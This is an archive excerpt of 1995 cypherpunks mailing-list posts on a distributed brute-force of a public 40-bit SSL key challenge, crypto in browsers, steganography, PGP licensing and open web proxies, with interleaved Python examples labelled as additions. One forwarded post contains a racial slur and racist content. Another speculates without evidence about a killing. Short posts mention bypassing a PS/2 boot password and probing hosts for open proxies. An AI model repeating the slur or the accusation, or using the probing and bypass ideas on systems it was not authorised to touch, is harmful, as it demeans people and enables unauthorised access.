c) Use hex numbers in a config file.  I.e., don't use uuencode on web page.

d) We're going to have the programs (bruteRC4.c and bruteSSL.c) produce
   a checksum on completion.  Acknowledgements of swept keyspace must be
   with checksum.  Crude check to reduce chances of mistyped big hex nums.
   
   Represent the key space as a 4 digit hex number like this: 1a23, in
   terms of 24 bit keyspaces, and represent keyspace to sweep in terms
   of numbers of those, lots of people had difficulty reasoning in log
   base2 for bits.

e) Do nothing yet.  If we get lots of compute and it proves to be a
   problem perhaps implement some redundancy into the system.


Coming soon brute force attempt on Hal Finney's brute of 40+88bit SSL.
Watch this space, several cypherpunks are hard at work optimising
their bruteSSL.c code, and also writing farming software via a system
of servers connected via sockets.  The WWW page doler will still be
available for those without direct IP.

Hal Finney's SSL challenge is here:

	http://www.portal.com/~hfinney/sslchal.html

More on SSL later, but we hoped to give the SSL one a wider announce
in sci.crypt, and see how *fast* we can brute 40 bit keyspace.

Hope to see your compute in the brute SSL effort when it is announced,

Adam
--
HAVE *YOU* EXPORTED A CRYPTO SYSTEM TODAY? --> http://dcs.ex.ac.uk/~aba/rsa/
--rsa--------------------------------8<-------------------------------------
#!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL
($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%
Sa2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print pack('H*'
,$_)while read(STDIN,$m,($w=2*$d-1+length($n||die"$0 [-d] k n\n")&~1)/2)
-------------------------------------8<-------------------------------------
TRY: echo squeamish ossifrage | rsa -e 3 7537d365 | rsa -d 4e243e33 7537d365
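
The bookkeeping proposed under Solutions (c) and (d) in the message above, as an added example that is not part of the original post and is not the bruteRC4 code: segments of 2^24 keys named by 4-digit hex ids, acknowledgements that carry a check value, first acknowledgement counts, and the bits/percent tally. The check-value construction (truncated SHA-256), the `SweepLedger` class and the contributor names are assumptions made here; the post does not specify them.

```python
import hashlib
import math
import string

KEY_BITS = 40                                   # key space size, from the post
SEGMENT_BITS = 24                               # one segment = 2**24 keys, from the post
NUM_SEGMENTS = 1 << (KEY_BITS - SEGMENT_BITS)   # 65536 segments, ids 0000..ffff


def ack_checksum(start_hex, count):
    """Check value over (start segment, segment count).
    Assumption: the post does not define its checksum; truncated SHA-256 is used."""
    text = "%s:%d" % (start_hex.lower(), count)
    return hashlib.sha256(text.encode()).hexdigest()[:6]


class SweepLedger:
    """Hypothetical coordinator-side record of acknowledged key space."""

    def __init__(self):
        self.owner = [None] * NUM_SEGMENTS      # first acknowledger per segment
        self.rejected = []                      # (who, reason) for refused acks

    def _reject(self, who, reason):
        self.rejected.append((who, reason))
        return 0

    def acknowledge(self, who, start_hex, count, checksum):
        """Record an acknowledgement; return the number of newly credited segments."""
        if len(start_hex) != 4 or any(c not in string.hexdigits for c in start_hex):
            return self._reject(who, "segment id must be 4 hex digits")
        start = int(start_hex, 16)
        if count < 1 or start + count > NUM_SEGMENTS:
            return self._reject(who, "range outside the key space")
        if checksum.lower() != ack_checksum(start_hex, count):
            return self._reject(who, "checksum mismatch")
        credited = 0
        for seg in range(start, start + count):
            if self.owner[seg] is None:         # only the first acknowledgement counts
                self.owner[seg] = who
                credited += 1
        return credited

    def unswept(self):
        """Contiguous unacknowledged ranges as (start id, segment count)."""
        ranges, seg = [], 0
        while seg < NUM_SEGMENTS:
            if self.owner[seg] is None:
                start = seg
                while seg < NUM_SEGMENTS and self.owner[seg] is None:
                    seg += 1
                ranges.append(("%04x" % start, seg - start))
            else:
                seg += 1
        return ranges

    def tally(self):
        """Rows of (who, bits swept, percent of key space), largest share first."""
        counts = {}
        for who in self.owner:
            if who is not None:
                counts[who] = counts.get(who, 0) + 1
        rows = [(who, round(SEGMENT_BITS + math.log2(n), 1), 100.0 * n / NUM_SEGMENTS)
                for who, n in counts.items()]
        return sorted(rows, key=lambda r: -r[2])


def demo_ledger():
    """Constructed acknowledgements: two valid, one duplicate, one mistyped."""
    ledger = SweepLedger()
    ledger.acknowledge("alice", "0000", 9216, ack_checksum("0000", 9216))
    ledger.acknowledge("bob", "2400", 16, ack_checksum("2400", 16))
    ledger.acknowledge("carol", "2400", 16, ack_checksum("2400", 16))  # already swept
    ledger.acknowledge("dave", "2401", 16, ack_checksum("2410", 16))   # digits transposed
    return ledger


if __name__ == "__main__":
    led = demo_ledger()
    for who, bits, pct in led.tally():
        print("%.1f bits (%.3f%%) %s" % (bits, pct, who))
    print("unswept:", led.unswept())
    print("rejected:", led.rejected)
```

Anyone can compute this check value without sweeping anything, so it only catches mistyped ranges; false claims of swept key space (point e) would still need the redundancy the post defers.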





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: H Keith Henson <hkhenson@shell.portal.com>
Date: Wed, 19 Jul 95 17:05:24 PDT
To: sandfort@crl.com
Subject: Re: cypherpunk "Zen" victories
Message-ID: <199507200244.TAA14857@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain



> 4) only *one* address was compromised on Julf's system. a small price
> to pay for all this    

Just for what it is worth, there has been considerable speculation as
to the fate of -AB-, whose real login was tc@alumni.caltech.edu.  The
real world name was supplied by Caltech to the LAPD who, it seems, 
turned it over to the scientologists.  Caltech has been trying to 
contact this person for some time now, after being presented with a
very irregular written request to turn the backup tapes on this act
over to the CoS reps.  CoS upper management has long shown the 
willingness to kill (as exposed by affidavits) but has failed in the
"execution" phase.  It really makes me wonder if they managed it
this time.  Keith Henson




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Wed, 19 Jul 95 20:24:58 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win
Message-ID: <v02120d2cac338abe35db@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



>Integration of crypto into Netscape is thus the Big Win.
>

This is why Amanda and I have been working on crypto tools
for Java, a "safe" programming language that will be embedded
in Netscape in the (hopefully) not-too-distant future. In
addition to eventual incorporation in Netscape, it is currently
available on Suns running Solaris 2.4 and PCs running Windows NT.

See: http://www.cs.utexas.edu/users/achou/JCrypt/packages.html

This is also why October is "Java month" for the cypherpunks
Bay Area meeting. Marianne Mueller (mrm@eng.sun.com) is
organizing speakers and coordinating the schedule for that
month's meeting.

Java will be available for Windows 95 about the time Win 95 is
released, and a Mac version is due out "Real Soon Now." The
Mac version has been demoed to industry insiders already. One
of the obvious advantages is that it should be possible to
write a nice, GUI interface once, and be done with all of the
tiresome porting that seems to occupy too much of our time.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Wed, 19 Jul 95 17:19:14 PDT
To: mfroomki@umiami.ir.miami.edu
Subject: Re: 9th Amendment References
In-Reply-To: <2561@umlaw.demon.co.uk>
Message-ID: <199507200025.UAA02138@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain


Michael Froomkin writes:

> As my final word on this thread, let me say that if you are really
> interested in the 9th Amendment, by far the best legal article on 
> the subject  that I know of is Charles L. Black, Jr, On Reading 
> and Using the Ninth Amendment.

You need LEXIS to look this up? Must have been published in one of
those legal journals that only the priests of the black robe are
allowed to subscribe to. :)

May I recommend Bennett B. Patterson: _The Forgotten Ninth Amendment: A Call
for Legislative and Judicial Recognition of Rights Under Social Conditions of
Today_. Originally published in 1955 by Bobbs-Merrill of Indianapolis and
authored by a member of the Texas Bar. Supposedly long out of print, the
master plates are rumored to have been destroyed. A reprinted edition was
being made available recently as part of a "9th Amendment Legal Defense Kit"
that a man named Conrad LeBeau was selling a few years ago (by all reports,
he was fighting the FDA with marginal success, since FDA jurisdiction is a
matter of contract law). At last report, you could reach Conrad at: Health
Freedom Reporter, PO Box 272, Hales Corner, WI, USA.

Another good one is Randy Barnett's _The Rights Retained by the People: The
History and Meaning of the Ninth Amendment_. The Web link at Book Stacks is:

http://melville.books.com/scripts/view.exe?sid~cMLVLlgYLKcBX4f/ISBN~0913969443

-- 

 http://yakko.cs.wmich.edu/~frogfarm      |          PGP signed mail preferred
"On a superhighway existing roads are destroyed, it's easy to monitor traffic,
you can't make your on-ramp, politics controls development and they arrest you
if you go too fast, travel in your own direction or use unapproved technology."
 - kpc@ptolemy.arc.nasa.gov               |              Freedom...yeah, right.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Elliott <paul.elliott@hrnowl.lonestar.org>
Date: Wed, 19 Jul 95 14:20:36 PDT
To: eff-austin-directors@zilker.com (EFF austin board of directors)
Subject: Why no action alert, coalition opposing S. 974?
Message-ID: <300d66d0.flight@flight.hrnowl.lonestar.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have read the EFF analysis of Senate bill 974, which is designed to
inhibit encryption on Networks. I think that it is a thoughtful document
but I am concerned that there has been no action alert produced to tell
people the most effective way to oppose this horrible Bill. People
who are concerned about the bill need to know what Senators could most
profitably be contacted. Also why has no coalition been formed to oppose
this bill? I am aware that many people are busy opposing S314, but
S974 is equally terrible as it attempts to suppress free expression.

I could try to produce an action alert myself, but I would probably make
errors as I am not up on the legal subtleties and the intricacies of
Congress. Could some of the savvy people please write an action alert?
Otherwise I will be forced to take a stab at it.

- -- 
Paul Elliott                                  Telephone: 1-713-781-4543
Paul.Elliott@hrnowl.lonestar.org              Address:   3987 South Gessner #224
                                              Houston Texas 77063






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: corbeau@seanet.com
Date: Wed, 19 Jul 95 21:58:07 PDT
To: cypherpunks@toad.com
Subject: FWD:Speaker needed
Message-ID: <Pine.NXT.3.91.950719215606.12612A-100000@kisa>
MIME-Version: 1.0
Content-Type: text/plain


>Sender: html-authors-guild-owner@lists.Stanford.EDU
>Status:   
>
>Two topics to this post:
>
>1.  I have been asked to speak at an Internet/WWW conference that will be
>held in Charlotte, NC on October 23rd.  Is the SC gonna jump on me for
>mentioning my membership in the Guild in the bio that they will print in the
>advertising flyers? <g>
>
>2.  I have been contacted by the producer of the conference and asked to
>contact the Guild for help in finding an Internet Security Guru to speak at
>the conference... If interested, point of contact is:
>
>rstoker@accunet.com
>
>
>I will be posting more info (costs, location, times, etc.) as they come to me.
>
>BTW: Speaking of security, I have asked a question that has gone unanswered
>(possibly due to being sidetracked by flamewars & whatnot)... anyone out
>there know how to set up password security on pages running off
>MacHTTP/WebStar servers?  Any help is appreciated!
>
>TIA
>
>  -AL GORDON
>   ProEMail Internet Services
****************************

Thot one o' y'all might fit this bill...

-corbeau





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Wed, 19 Jul 95 20:37:06 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: Stego Standards Silly
Message-ID: <8AD8535.00030001EC.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


LM> I think I need to clarify my threat model. I'm positing a scenario in which
LM> transmission of ciphertext and stegoed anything is illegal, but transmission
LM> and use of "conspicuous" digital signatures is legal. Furthermore, the govt.
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  Ah.  No big deal then.  After stegoing, you sign the GIF.

LM> sanitizes the LSBs of digital images for our protection, perhaps distorting
LM> a mean of X% of the LSBs of a mean of Y% of transmitted images. Out-of-stego-
LM> channel checksummation would IMHO be crucial in such a situation.

  Sending multiple copies of the same GIF would go a long way toward
solving this, if X% and Y% were low enough. Say I get 5 copies, and
reconstruct the original via a "voting" protocol. Also, if we break down
the file into smaller blocks, and sign each block individually, we can
narrow down the errors.

  But I am having a real problem with an overt policy of fiddling with
people's mail. If they did that, it would likely cause a huge backlash
that would be felt at the ballot box.



 *    
---
 * Monster@FAmend.Com *    
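
The voting and per-block checking idea from the message above, as an added example that is not part of the original post: several copies that each arrive with some low-order bits altered are combined by bitwise majority, and per-block checks show which blocks are still wrong and allow them to be repaired from a single intact copy. SHA-256 block digests stand in for the per-block signatures (the digest list is assumed to arrive intact, for instance under one signature); the 64-byte block size, the function names and the sample data are constructed here.

```python
import hashlib

BLOCK = 64  # bytes per independently checked block (assumed size)


def block_digests(data, block=BLOCK):
    """SHA-256 of each block; this list is what the sender would sign."""
    return [hashlib.sha256(data[i:i + block]).digest()
            for i in range(0, len(data), block)]


def majority_vote(copies):
    """Bitwise majority over an odd number of equal-length copies."""
    n = len(copies)
    if n % 2 == 0 or len({len(c) for c in copies}) != 1:
        raise ValueError("need an odd number of equal-length copies")
    out = bytearray(len(copies[0]))
    for i in range(len(out)):
        for bit in range(8):
            ones = sum((c[i] >> bit) & 1 for c in copies)
            if 2 * ones > n:
                out[i] |= 1 << bit
    return bytes(out)


def damaged_blocks(data, digests, block=BLOCK):
    """Indices of blocks whose digest does not match the trusted list."""
    got = block_digests(data, block)
    if len(got) != len(digests):
        raise ValueError("data length does not match the digest list")
    return [k for k, d in enumerate(got) if d != digests[k]]


def recover(copies, digests, block=BLOCK):
    """Vote first, then repair any block the vote got wrong from a single
    copy whose block verifies. Returns (data, indices still unverified)."""
    result = bytearray(majority_vote(copies))
    unrecovered = []
    for k in damaged_blocks(bytes(result), digests, block):
        lo, hi = k * block, (k + 1) * block
        for c in copies:
            if hashlib.sha256(c[lo:hi]).digest() == digests[k]:
                result[lo:hi] = c[lo:hi]
                break
        else:
            unrecovered.append(k)   # every copy of this block was altered
    return bytes(result), unrecovered


def flip_lsb(data, positions):
    """Return a copy of data with the low bit flipped at the given offsets."""
    out = bytearray(data)
    for p in positions:
        out[p] ^= 1
    return bytes(out)


# Constructed sample: a 256-byte payload and five received copies, each with
# different altered bytes. Byte 3 is altered in three of the five copies, so
# the majority vote alone gets block 0 wrong.
ORIGINAL = bytes(range(256))
DIGESTS = block_digests(ORIGINAL)
COPIES = [
    flip_lsb(ORIGINAL, [3, 70]),
    flip_lsb(ORIGINAL, [3, 130]),
    flip_lsb(ORIGINAL, [200]),
    flip_lsb(ORIGINAL, [3]),
    flip_lsb(ORIGINAL, [255]),
]

if __name__ == "__main__":
    voted = majority_vote(COPIES)
    print("blocks wrong after voting:", damaged_blocks(voted, DIGESTS))
    data, bad = recover(COPIES, DIGESTS)
    print("recovered exactly:", data == ORIGINAL, "unverified blocks:", bad)
```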




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jon cameron <cellf@free.org>
Date: Wed, 19 Jul 95 20:20:09 PDT
To: cypherpunks@toad.com
Subject: PS/2 passwd bypassed at bootup?
Message-ID: <Pine.BSD.3.91.950719221913.1286A-100000@squeaky.free.org>
MIME-Version: 1.0
Content-Type: text/plain


I know that removing the battery in a PS/2 "disengages" the password.
But can it be disengaged if a person has an administration-type of 
diagnostic/setup/boot-up floppy?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tim werner <werner@mc.ab.com>
Date: Wed, 19 Jul 95 16:53:32 PDT
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Is it legal for commercial companies to use PGP?
Message-ID: <9507200230.AA05467@mondo.ab.com>
MIME-Version: 1.0
Content-Type: text/plain


>From stewarts@ix.netcom.com  Tue Jul 18 02:51:50 1995
>Date: Mon, 17 Jul 1995 23:52:35 -0700

>At 09:07 PM 7/17/95 -0400, tim werner wrote:
>>>... I was talking to one of the sys admins at
>>>A-B, and he said that we weren't allowed to use PGP to encrypt our mail,
>>>because Viacrypt owned the commercial rights.

>Actually, it's less clear than that.

>Selling software containing the code is pretty clearly commercial.
>Non-commercial messages from your personal non-business machine are
>clearly non-commercial.  Providing a service of encrypting and decrypting
>messages for people for money sounds like it's _very_ probably commercial.
>Encrypting and decrypting messages to/from your business that deal with money
>are a very gray area.

Maybe "commercial company" is the wrong expression.  All I meant was
that my company is not non-profit, or a university, or a government
organization.  It is an engineering firm.  What I have in mind is
nothing to do with a commercial use of encryption per se. 

If they decided to put encryption into a product, that would be
something else entirely.  I doubt they would ever be using it to accept
payment for the stuff they sell, although I don't really know much about
the marketing aspect of the business.

Basically, I have two potential uses for it:

1) I have some email pen-pals that I would like to be able to use PGP to
   talk with.  All my other accounts (freenet, school) have mail
   forwarded to what I think of as my email "home address", which is my
   work address.  I would like to use that work account to process my
   email.  Is it legal to use PGP 2.6.2 for this purpose?  I'd also like
   to be able to tell fellow workers that they can use it, and show them
   how. 

2) It's entirely likely that people within the company may wish to get
   into the habit of transmitting company data in encrypted form.  This
   is not a question of incorporating the encryption technology into a
   product, or even into the sale of a product -- it's just a question
   of keeping intra-company information transfers private.


The first is the one I'm really concerned with.  The second would be
sort of a natural extension that, if legal, would be nice.  I can't
imagine that these uses are subject to the ViaCrypt license, but I need
some reassurance/ammunition in order to be a little more open about
getting it installed on the machines in my department.


thanks,
tw

-- 

Well, Bust My Britches!  Eggs Almondine and a Bottle of Beaujolais!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
Date: Wed, 19 Jul 95 19:07:37 PDT
To: "Timothy C. May" <tcmay@sensemedia.net>
Subject: Re: Stego-Rants ?
In-Reply-To: <ac327d250c021004491e@[205.199.118.202]>
Message-ID: <Pine.3.89.9507192123.A5264-0100000@skypoint-gw.globelle.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 19 Jul 1995, Timothy C. May wrote:

> At 7:57 AM 7/19/95, Douglas B. Renner wrote:
[snip]
> >I'd conjecture that it's possible.  Imagine fractal compression of a text
> >file, with the decompression routine adding some "randomness" which would
> >be your message, obscured at a very abstract level.  Depending on how
> >much "randomness" was added, I'm wondering if the resulting text might
> >possibly retain some of its original legibility (?)  ...
[snip]
> >(I am looking at an ad for a graphics program, "Images Incorporated" by
> >Iterated Systems which with fractal techniques can achieve 100:1
> >compression -- and then -- decompress to 8 times the original bitmap size
> >with minimal added distortion.)
> 
> But fractal compression schemes are usually _lossy_, that is, some of the
> original bits are irretrievably lost. (This should be clear also from the
> amount of compression achieved....multiple files/images compress to the
> "same" smaller file--by the "pigeonhold principle.")
> 
> Lossy compression is often OK for visual images and audible files, a la
> music, but would be pretty bad for any scheme dependent on encryption.
> 

Yes; however, it's not so much the compression ratio I was concerned with 
other than that it demonstrates the level of abstraction achieved in the 
analysis.  For crypto we wouldn't really mind if the intermediate fractal 
file were actually larger than the original and I assume that these 
techniques can be lossless if we are willing to accept this tradeoff.

What I think is remarkable about the example of compression and
enlargement is that with the process of enlargement, image *detail* is 
added in a manner consistent with the original.  (!!!)  By altering the 
decompression with a hidden message one would, of course, be replacing 
or adding information, and if the goal were to have this new information 
"blend in" with its container, then perhaps we could learn from fractal 
compression. 

Doug




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 19 Jul 95 22:53:50 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win
In-Reply-To: <v02120d2cac338abe35db@[199.2.22.120]>
Message-ID: <199507200552.WAA09896@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I also agree that Netscape and similar browsers are a good target for
crypto applications.  I am working on a program (tentatively called
webcloak) which runs on your PC next to your browser.  You set the
proxy in the browser to point at this program.  This is a dialog box in
Netscape and I think most browsers have this support.  Then all of your
communications go through this program.

Unfortunately progress has been slow as I have been having to learn
Winsock programming and re-learn Windows programming.  But I do have a
dummy program working which will pass commands through.  It does not
encrypt anything yet but simply redirects commands to a web proxy running on
the net.  Soon I will work on adding encryption, but the next step is to
add dialog boxes to choose the web proxy to use.  Right now it is hard
coded in.

Someone posted recently that the formerly open web proxy at
http://www.proxy.aol.com:80/ is no longer responding.  Also, a list
member was running one for a while at http://spirit.aud.alcatel.com:8082/
but that is no longer working either.  I have been looking for proxies by
searching the incoming connection logs on this commercial system.  I
figure that some of the more frequently appearing hosts may be proxies.
I telnet to them on port 80 and type "GET http://sony.com/".  This is
just a URL I use because it is short.  Usually nothing happens but I have
found a couple of proxies that still work.  At this point I don't want to
publicize them because they might be shut down as a result.

I think running open web proxies (and another kind of proxy I will
describe in a future message) will be a good thing for Cypherpunks to do.
I know not everyone can do it; it takes more privileges and clout to keep
a server running than to drop in a mail filter.  But for those who do
have the ability to leave background processes running I think these will
be the remailers of the future.  I hope some list members will start
doing this.

As another solution, I have developed a Perl script which anyone who can
run CGI scripts can use to become a web proxy.  Fortunately (and somewhat
mysteriously) this commercial system lets me do that.  Basically if you
want to connect to http://www.mcom.com/ you instead connect to
http://www.portal.com/~hfinney/webcloak.cgi?http://www.mcom.com/.  The
name of the CGI script and "?" is prepended to the desired URL.  The
script then receives the part after the "?" as its argv so it opens the
URL and passes it back.  So if you can't run a server but can install CGI
scripts then you can run this "poor man's proxy".

Unfortunately the standard proxy protocol will not work transparently
with this; the CGI script and "?" pasting isn't done automatically by
browsers.  However my PC "webcloak" program does work with this kind of
proxy; it pastes the required prefix string at the front of each URL.  So
if people do start using this approach the CGI proxies may be part of the
solution.

Soon I hope to be far enough along to ask people to start testing some of
this software.  Once I get the webcloak program able to be reconfigured
by the end user I'll ask people to try it to see if it works on anybody
else's PC than mine.  It should hopefully work with anything that uses
Winsock.

Eventually I hope to see a lot of people running web proxies and privacy
proxies (which just pass requests through to other web and privacy
proxies - these are very simple connection redirectors, but do encryption
and decryption for privacy).  The end user can connect to a web site and
update his list of proxy servers.  Then when he fires up his local proxy
interface program it can ping the various servers and print a summary of
their response times.  He clicks on the ones he wants, setting up a
chain.  Only the last one in the chain needs to be capable of proxying
http requests, the others just pass data through.

The local program connects to each of the proxies and negotiates a
session key using PK encryption.  This will be cached and used over a
moderately extensive period of time, at least a few minutes.  We can't
possibly do a PK decryption for each link in a proxy for every .gif file
in a page.  That would be too slow.  So instead it will just send a cache
identifier to indicate which encryption key is in use.

This is all pretty ambitious as you can see, but I am trying to do it
incrementally.  Even a basic system without encryption and where the user
has to edit a text file to choose his proxy chain will provide some
privacy protection.  So I hope I will be able to interest people in
providing the infrastructure needed for privacy protection on the Web.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBMA3umxnMLJtOy9MBAQHpSQIAvI/YB9JmGgwIaFWxCegAUtZ94eIHvOFU
wVQPdXlvaLup8Kjcx1wTPm/oib8u7Ema+6eb/MGsQWrnYtCO8emoew==
=zx5U
-----END PGP SIGNATURE-----
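
The URL-prefix scheme described in the message above, as an added example that is not part of the original post and is not Hal's Perl script. The second proxy prefix, the sample target URL, the http-only check and the chaining of two CGI prefixes are assumptions made here for illustration.

```python
from urllib.parse import urlsplit

# The first prefix is the one given in the message; the second is constructed.
PORTAL_PREFIX = "http://www.portal.com/~hfinney/webcloak.cgi?"
SECOND_PREFIX = "http://proxy2.example/cgi-bin/cloak.cgi?"  # hypothetical


def cloak(url, prefixes):
    """Client side: paste each proxy prefix in front of the URL.

    prefixes[0] is the proxy the browser contacts, so it ends up outermost.
    """
    for prefix in reversed(prefixes):
        if not prefix.endswith("?"):
            raise ValueError("proxy prefix must end in '?': %r" % prefix)
        url = prefix + url
    return url


def target_from_cgi(environ):
    """Proxy side: return the URL this CGI script should fetch.

    Reads QUERY_STRING rather than argv: CGI only fills argv when the query
    contains no '=', so a target with its own query string would be lost.
    """
    target = environ.get("QUERY_STRING", "")
    parts = urlsplit(target)
    # Added restriction (assumption): fetch only absolute http URLs, so the
    # script cannot be pointed at file: or other local resources.
    if parts.scheme.lower() != "http" or not parts.hostname:
        raise ValueError("refusing target %r" % target)
    return target


def hops(request_url, prefixes):
    """List what each proxy in the chain is asked to fetch, in order."""
    fetched = []
    current = request_url
    while any(current.startswith(p) for p in prefixes):
        # Split on the first '?' only; later ones belong to the inner URL.
        query = current.split("?", 1)[1]
        current = target_from_cgi({"QUERY_STRING": query})
        fetched.append(current)
    return fetched


if __name__ == "__main__":
    page = "http://www.mcom.com/search?q=privacy&n=10"  # constructed target
    wrapped = cloak(page, [PORTAL_PREFIX, SECOND_PREFIX])
    print(wrapped)
    for url in hops(wrapped, [PORTAL_PREFIX, SECOND_PREFIX]):
        print("fetch:", url)
```

Each proxy in such a chain sees the full remainder of the URL in the clear, which is why the message goes on to propose encrypted privacy proxies for the intermediate hops.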




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hshubs@BIX.com
Date: Wed, 19 Jul 95 20:13:44 PDT
To: jmm0021@alamo.net
Subject: RE: There is a God
In-Reply-To: <2yc78c1w165w@alamo.net>
Message-ID: <9507192311.memo.13425@BIX.com>
MIME-Version: 1.0
Content-Type: text/plain


Where was this reported, please?

-------- Original Message --------

Return-path: <owner-cypherpunks@toad.com>
Received: from delphi.com by bix.com (CoSy3.31.1.50) id
 <9507130936.memo.90466@BIX.com>; Thu, 13 Jul 1995 09:36:37 -0400 (EDT)
Received: from relay4.UU.NET by delphi.com (PMDF V4.3-9 #10880)
 id <01HSTF2JAFE899G4G7@delphi.com>; Thu, 13 Jul 1995 09:34:42 -0400 (EDT)
Received: from toad.com by relay4.UU.NET with SMTP id QQyyfe10461; Thu,
 13 Jul 1995 09:30:32 -0400
Received: by toad.com id AA14137; Thu, 13 Jul 95 06:09:07 PDT
Received: from news1.crl.com by toad.com id AA14131; Thu, 13 Jul 95 06:09:02 PDT
Received: from alamo.net by news1.crl.com with UUCP id AA02826
 (5.65c/IDA-1.502 for cypherpunks@toad.com); Thu, 13 Jul 1995 05:50:46 -0700
Received: (from waffle@localhost) by ephsa.alamo.net (8.6.10/8.6.10)
 with UUCP id GAA12500 for cypherpunks@toad.com; Thu, 13 Jul 1995 06:18:35 -0500
From: jmm0021@alamo.net (Jason Montgomery)
Date: Thu, 13 Jul 1995 06:12:12 -0500 (CDT)
To: cypherpunks@toad.com
Message-id: <2yc78c1w165w@alamo.net>
Subject: There is a God
Sender: owner-cypherpunks@toad.com
Content-transfer-encoding: 7BIT
Organization: ALAMO Internet  --  San Antonio, Texas
X-Envelope-to: bix.com!hshubs
Precedence: bulk

On ABC's latenight news program I just saw a story that renewed my faith 
that there is a God and he is brown.  It seems that the Alabama Milita 
was able to film a ATF event that was truly horrifing to behold.  Nigger 
Hunging Licenses and the works.  Well our friends in Alabama gave the 
tapes to ABC and the story was blown wide open.  Our friends from Alabama 
in the pursuit of the ATF did the world a great service and completely 
restored my faith in America.

Jason Montgomery

ps.  The spelling errors are all mine its 6 in the morning and im out of 
caffine.

----------------------------------------------------------------
Jason Montgomery                            
jmm0021@alamo.net                           
----------------------------------------------------------------
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol Sysadmin]" <erc@khijol.intele.net>
Date: Wed, 19 Jul 95 23:13:55 PDT
To: Douglas Barnes <cman@communities.com>
Subject: Re: Netscape the Big Win
In-Reply-To: <v02120d2cac338abe35db@[199.2.22.120]>
Message-ID: <Pine.3.89.9507200057.M2934-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 19 Jul 1995, Douglas Barnes wrote:

> Java will be available for Windows 95 about the time Win 95 is
> released, and a Mac version is due out "Real Soon Now." The
> Mac version has been demoed to industry insiders already. One
> of the obvious advantages is that it should be possible to
> write a nice, GUI interface once, and be done with all of the
> tiresome porting that seems to occupy too much of our time.

I assume that there is a version available for UNIX, yes?
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Thu, 20 Jul 95 00:39:04 PDT
To: tim werner <werner@mc.ab.com>
Subject: Re: Is it legal for commercial companies to use PGP?
Message-ID: <199507200736.AAA05001@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:30 PM 7/19/95 -0400, tim werner wrote:
>>From stewarts@ix.netcom.com  Tue Jul 18 02:51:50 1995
>>Selling software containing the code is pretty clearly commercial.
>>Non-commercial messages from your personal non-business machine are
>>clearly non-commercial.  Providing a service of encrypting and decrypting
>>messages for people for money sounds like it's _very_ probably commercial.
>>Encrypting and decrypting messages to/from your business that deal with money
>>are a very gray area.
>
>Maybe "commercial company" is the wrong expression.  All I meant was
>that my company is not non-profit, or a university, or a government
>organization.  It is an engineering firm.  What I have in mind is
>nothing to do with a commercial use of encryption per se. 

That's what I thought you meant.



>1) I have some email pen-pals that I would like to be able to use PGP to

That would be fine to use PGP 2.6.2 for; there's really no question.

>2) It's entirely likely that people within the company may wish to get
>   into the habit of transmitting company data in encrypted form.  This
>   is not a question of incorporating the encryption technology into a
>   product, or even into the sale of a product -- it's just a question
>   of keeping intra-company information transfers private.
>The first is the one I'm really concerned with.  The second would be
>sort of a natural extension that, if legal, would be nice.  I can't
>imagine that these uses are subject to the ViaCrypt license, but I need
>some reassurance/ammunition in order to be a little more open about
>getting it installed on the machines in my department.

The ViaCrypt license only matters if you're using ViaCrypt.
The question of whether you can use PGP 2.6.2 for these is something
you _do_ need to read the RSAREF license about, and maybe ask
Jim Bidzos <jim@rsa.com> or a company lawyer-type about;
encrypted mail within the company is probably ok, encrypted mail sending
credit card numbers to pay for stuff is more questionable.
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Thu, 20 Jul 95 00:38:42 PDT
